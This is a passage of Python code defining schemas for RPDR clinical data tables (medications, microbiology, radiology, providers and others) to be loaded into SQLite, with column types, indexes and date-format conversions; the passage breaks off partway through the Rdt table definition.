# single comprehension so the shared TableColumn defaults (no primary key,
# not unique, no foreign key) are stated once.
Lno = Table(
    name = 'Lno',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = True,
    useInTimeline = True,
    columns = [
        TableColumn(
            name = colName,
            type = colType,
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = required,
            foreignKeyRef = None,
            timelineDate = isTlDate,
            timelineBlurb = isTlBlurb,
            dateReformat = reformat
        )
        # spec: (name, sqlType, indexed, required, timelineDate, timelineBlurb, dateReformat)
        for colName, colType, indexed, required, isTlDate, isTlBlurb, reformat in [
            ("EMPI",         "TEXT",     True,  True,  False, False, None),
            ("MRN_Type",     "TEXT",     False, False, False, False, None),
            ("MRN",          "TEXT",     False, False, False, False, None),
            ("LMRNote_Date", "DATETIME", False, False, True,  False,
             DateReformat( format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT )),
            ("Record_Id",    "TEXT",     False, False, False, False, None),
            ("Status",       "TEXT",     False, False, False, False, None),
            ("Author",       "TEXT",     False, False, False, False, None),
            ("COD",          "TEXT",     False, False, False, False, None),
            ("Institution",  "TEXT",     False, False, False, False, None),
            ("Author_MRN",   "TEXT",     False, False, False, False, None),
            ("Subject",      "TEXT",     False, False, False, True,  None),
            ("Comments",     "TEXT",     False, False, False, False, None),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Lpr RPDR table
# Lpr is built table-driven: one spec tuple per column, expanded through a
# single comprehension so the shared TableColumn defaults (no primary key,
# not unique, no foreign key) are stated once.
Lpr = Table(
    name = 'Lpr',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        TableColumn(
            name = colName,
            type = colType,
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = required,
            foreignKeyRef = None,
            timelineDate = isTlDate,
            timelineBlurb = isTlBlurb,
            dateReformat = reformat
        )
        # spec: (name, sqlType, indexed, required, timelineDate, timelineBlurb, dateReformat)
        for colName, colType, indexed, required, isTlDate, isTlBlurb, reformat in [
            ("EMPI",                 "TEXT",     True,  True,  False, False, None),
            ("MRN_Type",             "TEXT",     False, False, False, False, None),
            ("MRN",                  "TEXT",     False, False, False, False, None),
            ("LMR_Problem_Date",     "DATETIME", False, False, True,  False,
             DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )),
            ("LMR_Text_Description", "TEXT",     False, False, False, True,  None),
            ("Concept_ID",           "TEXT",     False, False, False, False, None),
            ("LMR_Code_Description", "TEXT",     False, False, False, False, None),
            ("Comments",             "TEXT",     False, False, False, False, None),
            ("Type",                 "TEXT",     False, False, False, False, None),
            # Onset/Resolution/Procedure dates are stored as free TEXT in the
            # original schema (no DATETIME type, no reformat) — preserved as-is.
            ("Onset_Date",           "TEXT",     False, False, False, False, None),
            ("Resolution_Date",      "TEXT",     False, False, False, False, None),
            ("Procedure_Date",       "TEXT",     False, False, False, False, None),
            ("Modifiers",            "TEXT",     False, False, False, False, None),
            ("Acuity",               "TEXT",     False, False, False, False, None),
            ("Severity",             "TEXT",     False, False, False, False, None),
            ("Condition",            "TEXT",     False, False, False, False, None),
            ("Sensitivity_Flag",     "TEXT",     False, False, False, False, None),
            ("Location",             "TEXT",     False, False, False, False, None),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Lvs RPDR table
# Lvs is built table-driven: one spec tuple per column, expanded through a
# single comprehension so the shared TableColumn defaults (no primary key,
# not unique, no foreign key) are stated once.
Lvs = Table(
    name = 'Lvs',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        TableColumn(
            name = colName,
            type = colType,
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = required,
            foreignKeyRef = None,
            timelineDate = isTlDate,
            timelineBlurb = isTlBlurb,
            dateReformat = reformat
        )
        # spec: (name, sqlType, indexed, required, timelineDate, timelineBlurb, dateReformat)
        for colName, colType, indexed, required, isTlDate, isTlBlurb, reformat in [
            ("EMPI",                "TEXT",     True,  True,  False, False, None),
            ("MRN_Type",            "TEXT",     False, False, False, False, None),
            ("MRN",                 "TEXT",     False, False, False, False, None),
            ("LMR_Vital_Date_Time", "DATETIME", False, False, True,  False,
             DateReformat( format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT )),
            ("LMR_Text_Type",       "TEXT",     False, False, False, True,  None),
            ("Code",                "TEXT",     False, False, False, False, None),
            ("LMR_Code_Type",       "TEXT",     False, False, False, False, None),
            ("Result",              "TEXT",     False, False, False, False, None),
            ("Units",               "TEXT",     False, False, False, False, None),
            ("Site",                "TEXT",     False, False, False, False, None),
            ("Position",            "TEXT",     False, False, False, False, None),
            # NOTE(review): "Rythm" spelling kept byte-identical — it likely
            # mirrors the source file's header row; confirm before correcting.
            ("Rythm",               "TEXT",     False, False, False, False, None),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Mcm RPDR table
# Mcm (case/control match) columns are all required TEXT with no timeline
# role; only the two EMPI columns are indexed, so the per-column spec is
# reduced to (name, indexed).
Mcm = Table(
    name = 'Mcm',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = False,
    columns = [
        TableColumn(
            name = colName,
            type = "TEXT",
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = True,
            foreignKeyRef = None,
            timelineDate = False,
            timelineBlurb = False,
            dateReformat = None
        )
        for colName, indexed in [
            ("Control_Patient_EMPI", True),
            ("Case_Patient_EMPI",    True),
            ("Match_Strength",       False),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Med RPDR table
# Med is built table-driven: one spec tuple per column, expanded through a
# single comprehension so the shared TableColumn defaults (no primary key,
# not unique, no foreign key) are stated once.
Med = Table(
    name = 'Med',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        TableColumn(
            name = colName,
            type = colType,
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = required,
            foreignKeyRef = None,
            timelineDate = isTlDate,
            timelineBlurb = isTlBlurb,
            dateReformat = reformat
        )
        # spec: (name, sqlType, indexed, required, timelineDate, timelineBlurb, dateReformat)
        for colName, colType, indexed, required, isTlDate, isTlBlurb, reformat in [
            ("EMPI",                 "TEXT",     True,  True,  False, False, None),
            ("MRN_Type",             "TEXT",     False, False, False, False, None),
            ("MRN",                  "TEXT",     False, False, False, False, None),
            ("Medication_Date",      "DATETIME", False, False, True,  False,
             DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )),
            ("Medication",           "TEXT",     False, False, False, True,  None),
            ("Code_Type",            "TEXT",     False, False, False, False, None),
            ("Code",                 "TEXT",     False, False, False, False, None),
            ("Quantity",             "TEXT",     False, False, False, False, None),
            ("Provider",             "TEXT",     False, False, False, False, None),
            ("Clinic",               "TEXT",     False, False, False, False, None),
            ("Hospital",             "TEXT",     False, False, False, False, None),
            ("Inpatient_Outpatient", "TEXT",     False, False, False, False, None),
            ("Encounter_number",     "TEXT",     False, False, False, False, None),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Mic RPDR table
# Mic is built table-driven: one spec tuple per column, expanded through a
# single comprehension so the shared TableColumn defaults (no primary key,
# not unique, no foreign key) are stated once.
Mic = Table(
    name = 'Mic',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = True,
    useInTimeline = True,
    columns = [
        TableColumn(
            name = colName,
            type = colType,
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = required,
            foreignKeyRef = None,
            timelineDate = isTlDate,
            timelineBlurb = isTlBlurb,
            dateReformat = reformat
        )
        # spec: (name, sqlType, indexed, required, timelineDate, timelineBlurb, dateReformat)
        for colName, colType, indexed, required, isTlDate, isTlBlurb, reformat in [
            ("EMPI",                   "TEXT",     True,  True,  False, False, None),
            ("MRN_Type",               "TEXT",     False, False, False, False, None),
            ("MRN",                    "TEXT",     False, False, False, False, None),
            ("Microbiology_Number",    "TEXT",     False, False, False, False, None),
            ("Microbiology_Date_Time", "DATETIME", False, False, True,  False,
             DateReformat( format='%m/%d/%Y %H:%M:%S', reformat=SQLITE_DATE_FORMAT )),
            ("Specimen_Type",          "TEXT",     False, False, False, True,  None),
            ("Specimen_Comments",      "TEXT",     False, False, False, False, None),
            ("Test_Name",              "TEXT",     False, False, False, False, None),
            ("Test_Code",              "TEXT",     False, False, False, False, None),
            ("Test_Comments",          "TEXT",     False, False, False, False, None),
            ("Test_Status",            "TEXT",     False, False, False, False, None),
            ("Organism_Name",          "TEXT",     False, False, False, False, None),
            ("Organism_Code",          "TEXT",     False, False, False, False, None),
            ("Organism_Comment",       "TEXT",     False, False, False, False, None),
            ("Organism_Text",          "TEXT",     False, False, False, False, None),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Mrn RPDR table
# Mrn columns are all TEXT with no index and no timeline role. The only
# variation is the Enterprise_Master_Patient_Index column, which is the
# primary key (unique, required); the isKey flag drives all three of those
# settings exactly as the original literal spelled them out.
Mrn = Table(
    name = 'Mrn',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = False,
    columns = [
        TableColumn(
            name = colName,
            type = "TEXT",
            primaryKey = isKey,
            index = False,
            unique = isKey,
            notNull = isKey,
            foreignKeyRef = None,
            timelineDate = False,
            timelineBlurb = False,
            dateReformat = None
        )
        for colName, isKey in [
            ("IncomingId",                      False),
            ("IncomingSite",                    False),
            ("Status",                          False),
            ("Enterprise_Master_Patient_Index", True),
            ("MGH_MRN",                         False),
            ("BWH_MRN",                         False),
            ("FH_MRN",                          False),
            ("SRH_MRN",                         False),
            ("NWH_MRN",                         False),
            ("NSMC_MRN",                        False),
            ("MCL_MRN",                         False),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Opn RPDR table
# Opn is built table-driven: one spec tuple per column, expanded through a
# single comprehension so the shared TableColumn defaults (no primary key,
# not unique, no foreign key) are stated once.
Opn = Table(
    name = 'Opn',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = True,
    useInTimeline = True,
    columns = [
        TableColumn(
            name = colName,
            type = colType,
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = required,
            foreignKeyRef = None,
            timelineDate = isTlDate,
            timelineBlurb = isTlBlurb,
            dateReformat = reformat
        )
        # spec: (name, sqlType, indexed, required, timelineDate, timelineBlurb, dateReformat)
        for colName, colType, indexed, required, isTlDate, isTlBlurb, reformat in [
            ("EMPI",               "TEXT",     True,  True,  False, False, None),
            ("MRN_Type",           "TEXT",     False, False, False, False, None),
            ("MRN",                "TEXT",     False, False, False, False, None),
            ("Report_Number",      "TEXT",     False, False, False, False, None),
            ("MID",                "TEXT",     False, False, False, False, None),
            # 12-hour clock with AM/PM marker, unlike most other RPDR tables.
            ("Report_Date_Time",   "DATETIME", False, False, True,  False,
             DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )),
            ("Report_Description", "TEXT",     False, False, False, True,  None),
            ("Report_Status",      "TEXT",     False, False, False, False, None),
            ("Report_Type",        "TEXT",     False, False, False, False, None),
            ("Report_Text",        "TEXT",     False, False, False, False, None),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Pal RPDR table
# Pal is built table-driven: one spec tuple per column, expanded through a
# single comprehension so the shared TableColumn defaults (no primary key,
# not unique, no foreign key) are stated once.
Pal = Table(
    name = 'Pal',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        TableColumn(
            name = colName,
            type = colType,
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = required,
            foreignKeyRef = None,
            timelineDate = isTlDate,
            timelineBlurb = isTlBlurb,
            dateReformat = reformat
        )
        # spec: (name, sqlType, indexed, required, timelineDate, timelineBlurb, dateReformat)
        # NOTE(review): this table lists MRN before MRN_Type, the reverse of
        # most other tables here — order preserved exactly from the original.
        for colName, colType, indexed, required, isTlDate, isTlBlurb, reformat in [
            ("EMPI",                  "TEXT",     True,  True,  False, False, None),
            ("MRN",                   "TEXT",     False, False, False, False, None),
            ("MRN_Type",              "TEXT",     False, False, False, False, None),
            ("System",                "TEXT",     False, False, False, False, None),
            ("PEARAllergy_Date_Time", "DATETIME", False, False, True,  False,
             DateReformat( format='%m/%d/%Y %H:%M:%S', reformat=SQLITE_DATE_FORMAT )),
            ("Allergen",              "TEXT",     False, False, False, True,  None),
            ("Allergen_Type",         "TEXT",     False, False, False, False, None),
            ("Allergen_Code",         "TEXT",     False, False, False, False, None),
            ("Reaction",              "TEXT",     False, False, False, False, None),
            ("Comments",              "TEXT",     False, False, False, False, None),
            ("Status",                "TEXT",     False, False, False, False, None),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Pat RPDR table
# Pat is built table-driven: one spec tuple per column, expanded through a
# single comprehension so the shared TableColumn defaults (no primary key,
# not unique, no foreign key) are stated once.
Pat = Table(
    name = 'Pat',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = True,
    useInTimeline = True,
    columns = [
        TableColumn(
            name = colName,
            type = colType,
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = required,
            foreignKeyRef = None,
            timelineDate = isTlDate,
            timelineBlurb = isTlBlurb,
            dateReformat = reformat
        )
        # spec: (name, sqlType, indexed, required, timelineDate, timelineBlurb, dateReformat)
        for colName, colType, indexed, required, isTlDate, isTlBlurb, reformat in [
            ("EMPI",               "TEXT",     True,  True,  False, False, None),
            ("MRN_Type",           "TEXT",     False, False, False, False, None),
            ("MRN",                "TEXT",     False, False, False, False, None),
            ("Report_Number",      "TEXT",     False, False, False, False, None),
            ("MID",                "TEXT",     False, False, False, False, None),
            # 12-hour clock with AM/PM marker, unlike most other RPDR tables.
            ("Report_Date_Time",   "DATETIME", False, False, True,  False,
             DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )),
            ("Report_Description", "TEXT",     False, False, False, True,  None),
            ("Report_Status",      "TEXT",     False, False, False, False, None),
            ("Report_Type",        "TEXT",     False, False, False, False, None),
            ("Report_Text",        "TEXT",     False, False, False, False, None),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Phy RPDR table
# Phy is built table-driven: one spec tuple per column, expanded through a
# single comprehension so the shared TableColumn defaults (no primary key,
# not unique, no foreign key) are stated once.
Phy = Table(
    name = 'Phy',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        TableColumn(
            name = colName,
            type = colType,
            primaryKey = False,
            index = indexed,
            unique = False,
            notNull = required,
            foreignKeyRef = None,
            timelineDate = isTlDate,
            timelineBlurb = isTlBlurb,
            dateReformat = reformat
        )
        # spec: (name, sqlType, indexed, required, timelineDate, timelineBlurb, dateReformat)
        for colName, colType, indexed, required, isTlDate, isTlBlurb, reformat in [
            ("EMPI",                 "TEXT",     True,  True,  False, False, None),
            ("MRN_Type",             "TEXT",     False, False, False, False, None),
            ("MRN",                  "TEXT",     False, False, False, False, None),
            ("Date",                 "DATETIME", False, False, True,  False,
             DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )),
            ("Concept_Name",         "TEXT",     False, False, False, True,  None),
            ("Code_Type",            "TEXT",     False, False, False, False, None),
            ("Code",                 "TEXT",     False, False, False, False, None),
            ("Result",               "TEXT",     False, False, False, False, None),
            ("Units",                "TEXT",     False, False, False, False, None),
            ("Provider",             "TEXT",     False, False, False, False, None),
            ("Clinic",               "TEXT",     False, False, False, False, None),
            ("Hospital",             "TEXT",     False, False, False, False, None),
            ("Inpatient_Outpatient", "TEXT",     False, False, False, False, None),
            ("Encounter_number",     "TEXT",     False, False, False, False, None),
        ]
    ]
)
#--------------------------------------------------------------------------------------------
# define Prc RPDR table
Prc = Table(
name = 'Prc',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Procedure_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Code_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Procedure_Flag",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Quantity",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Provider",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Clinic",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Hospital",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Inpatient_Outpatient",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Encounter_number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Prv RPDR table
Prv = Table(
name = 'Prv',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Provider_Rank",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Is_PCP",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Last_Seen_Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Provider_Name",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Provider_ID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Address_1",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Address_2",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "City",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "State",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Zip",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Phone_Ext",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Fax",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "EMail",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Specialties",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Enterprise_service",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "CPM_Id",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Pul RPDR table
Pul = Table(
name = 'Pul',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Rad RPDR table
Rad = Table(
name = 'Rad',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = True,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MID",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Date_Time",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Report_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Report_Status",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Report_Text",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
)
]
)
#--------------------------------------------------------------------------------------------
# define Rdt RPDR table
Rdt = Table(
name = 'Rdt',
fileExt = 'txt',
csvDialect = StandardCsvDialect,
freeTextReportInLastColumn = False,
useInTimeline = True,
columns=[
TableColumn(
name = "EMPI",
type = "TEXT",
primaryKey = False,
index = True,
unique = False,
notNull = True,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN_Type",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "MRN",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Date",
type = "DATETIME",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = True,
timelineBlurb = False,
dateReformat = DateReformat( format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT )
),
TableColumn(
name = "Mode",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Group",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Code",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Test_Description",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = True,
dateReformat = None
),
TableColumn(
name = "Accession_Number",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Provider",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Clinic",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
name = "Hospital",
type = "TEXT",
primaryKey = False,
index = False,
unique = False,
notNull = False,
foreignKeyRef = None,
timelineDate = False,
timelineBlurb = False,
dateReformat = None
),
TableColumn(
